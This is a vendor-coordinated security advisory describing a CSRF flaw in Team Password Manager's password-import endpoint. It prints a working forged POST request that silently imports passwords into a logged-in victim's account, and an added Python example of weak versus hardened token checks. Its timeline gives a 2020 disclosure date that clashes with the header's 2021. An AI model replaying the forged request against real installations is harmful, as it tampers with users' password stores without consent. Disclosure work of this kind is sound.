-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-059
Product: Team Password Manager
Manufacturer: Ferran Barba
Affected Version(s): 9.125.225 (released 2021-04-30)
Tested Version(s): 9.125.225 (released 2021-04-30)
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Low
Solution Status: Fixed
Manufacturer Notification: 2021-10-28
Solution Date: 2021-11-12
Public Disclosure: 2021-11-30
CVE Reference: CVE-2021-44036
Author of Advisory: Stefan Walter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"Team Password Manager is a self hosted (also called on-premises) web app
that helps companies manage lots of passwords across lots of projects.
It's specially designed for teams that need to manage several passwords
in each project, that have lots of projects and that each project is
shared among several people."

Due to one single endpoint not enforcing its anti-CSRF token, the
application is vulnerable to CSRF.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The anti-CSRF token for the endpoint /index.php/mysettings/import_upload
is not checked. It can be left empty and the server will nonetheless
process the request. This allows cross-site requests to import passwords
into the area "My Passwords" of the affected user.

The impact on security is negligible since passwords can only be
imported into the personal area of users and not into shared projects.
Attributes of existing passwords under "My Passwords" could not be
overridden.

Other endpoints which do not check the anti-CSRF token were not
identified.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTML document can be deployed on the attacker's web server
and triggers the victim's browser to import the passwords.

Proof of Concept: CSRF Password Import

If a user is logged in to the TeamPasswordManager, and if they visit this
site in the same browser in another tab, then passwords are silently
added to their "My Passwords" page.

The following request is sent to the web server during the attack
(inessential headers were removed in the listing):

POST /index.php/mysettings/import_upload HTTP/1.1
Host: testinstallation
[...]
Cookie: PHPSESSID=ng3qmvt8ppqo7tg9f4jh04ipmm
Content-Type: multipart/form-data; boundary=--boundary
Content-Length: 809
Origin: null

----boundary
Content-Disposition: form-data; name="csrft"

----boundary
Content-Disposition: form-data; name="userfile"; filename="mypasswords.csv"
Content-Type: text/csv

"Test Password 0","","","user0@example.com","password","",""
"Test Password 1","","","user1@example.com","password","",""
"Test Password 2","","","user2@example.com","password","",""
"Test Password 3","","","user3@example.com","password","",""
"Test Password 4","","","user4@example.com","password","",""
"Test Password 5","","","user5@example.com","password","",""
"Test Password 6","","","user6@example.com","password","",""
"Test Password 7","","","user7@example.com","password","",""
"Test Password 8","","","user8@example.com","password","",""
"Test Password 9","","","user9@example.com","password","",""
----boundary--

The web server answers exactly as it does for legitimate requests and the
passwords are indeed imported (inessential headers were removed in the
listing).

HTTP/1.1 302 Found
[...]
Location: https://testinstallation/index.php/mysettings/import_result
[...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update Team Password Manager to the patched version.

We thank the vendor for quickly responding to our e-mail and providing a
solution.
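The defect in the listing above is that the "csrft" part is present but empty and the server still processes the upload. The following added example (not code from the advisory or from Team Password Manager) shows the shape of a server-side anti-CSRF check that accepts an empty token beside a hardened check that rejects it, and evaluates both against two constructed requests: one modelled on the advisory's forged request (empty token, "Origin: null") and one modelled on a legitimate same-origin form post. The session token, the site origin and the function names are assumptions for illustration; how the vendor's code was actually written is not known from the advisory.

```python
"""Added example: weak vs. hardened anti-CSRF check for a multipart upload.
Not the vendor's code; request values are constructed from the advisory."""
import hmac
import secrets
from typing import Optional, Tuple

# Assumed: the per-session token the server embedded in its own form.
SESSION_TOKEN = secrets.token_hex(32)
SITE = "https://testinstallation"  # assumed site origin from the listing


def weak_check(session_token: str, submitted: Optional[str]) -> bool:
    """Weak check: validates the token only when one was submitted, so an
    empty or missing 'csrft' field is accepted. This models the failure
    mode the advisory describes (an assumption, not the vendor's code)."""
    if submitted:
        return submitted == session_token
    return True


def strict_check(session_token: str, submitted: Optional[str],
                 origin: Optional[str], site_origin: str) -> Tuple[bool, str]:
    """Hardened check: the token must be present, must match the session
    token in constant time, and, when the browser sends an Origin header,
    it must name this site. Returns (accepted, reason) for logging."""
    if not submitted:
        return False, "missing anti-CSRF token"
    if not hmac.compare_digest(submitted, session_token):
        return False, "anti-CSRF token mismatch"
    # A form submitted from an opaque origin (e.g. a local HTML file)
    # arrives as 'Origin: null', exactly as in the advisory's listing.
    if origin is not None and origin != site_origin:
        return False, "unexpected Origin %r" % origin
    return True, "ok"


# Constructed from the advisory's PoC request: empty csrft, Origin: null.
FORGED = {"csrft": "", "origin": "null"}
# Constructed legitimate request: the site's own form posts the token.
LEGIT = {"csrft": SESSION_TOKEN, "origin": SITE}


def evaluate(request: dict) -> dict:
    """Run both checks on one parsed request and report the outcome."""
    accepted, reason = strict_check(SESSION_TOKEN, request["csrft"],
                                    request["origin"], SITE)
    return {
        "weak": weak_check(SESSION_TOKEN, request["csrft"]),
        "strict": accepted,
        "reason": reason,
    }


if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, evaluate(req))
```

The Origin comparison is a second, independent line of defence: it would have refused the advisory's request even if the token check had been skipped, and a logged "unexpected Origin 'null'" on a state-changing endpoint is a useful detection signal on its own.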
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-10-12: Vulnerability discovered
2021-10-28: Vulnerability reported to manufacturer
2021-11-12: Fixed in release 10.135.236 (see [2])
2020-11-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Team Password Manager
    https://teampasswordmanager.com/faq/what-is-teampasswordmanager/
[2] Changelog of the fixed version
    https://teampasswordmanager.com/docs/changelog/#10.135.236
[3] SySS Security Advisory SYSS-2021-059
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-059.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Walter of SySS GmbH.

E-Mail: stefan.walter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmGbbwgACgkQvguzEdo/
PhZ/3RAAnkLUEC8F9BXJYMit7beJHNvvbOIu6gMPMdDhH8vZbiaq5G09RAUOPEf+
qho47m+ZJQMN/Nhduk0tjd8R39sm3IJq86giWDkJFsxf2Raq8QuubuArt3WqlPzG
5fK+j20C/OgjVrymyZlyiTLxbWasnpONlfZcFcgudGDBrB+ieZs4kFQDipUJMJ+e
/3G1VY2IbREl5i4fD/nwkq1PXbEFNtNkMiHRrGEmYv6603phQLoAmj3H1VN/zMmP
Uc3f07rTI7VcR5PeW20JMp7BmdzJXh92c4MPwK3CpYjYxBaFT6/7ZGXMw1Qg33lf
tto/Y8CRlF1PKzTSHlTVudkxSfqLLgh947RJ1u+GZG1e8Ttuqci8fL4WnzEssit4
ijSJ+n8AAMhlub9/ZhGw/6etHtSorkTmp3VFs5r/azFUThdHx+GzvftHNJ/Rw/77
F8ulMjpTHe6WKih5YqyflE/wrvfqN6zSn6dFMa1CkZ83ntzI0lIWfjKzuHqYTVJW
2bXYgZORsd3yxnTqfh64ts1zPz4hZ6cVDVZjPqcRrOTEz8LurqdLtxR84z5Rp4KG
C17asbTJ4JyF6yH9L2BzoEi41kNE09pBzDnQerpPNcY/1zpeYRVXHKu/bTpWkVx1
Vl1YQIcyuv8hgfdpZCtMeWYok1p8ABCm5qFWavKBjoGu49s5gpA=
=I4Gt
-----END PGP SIGNATURE-----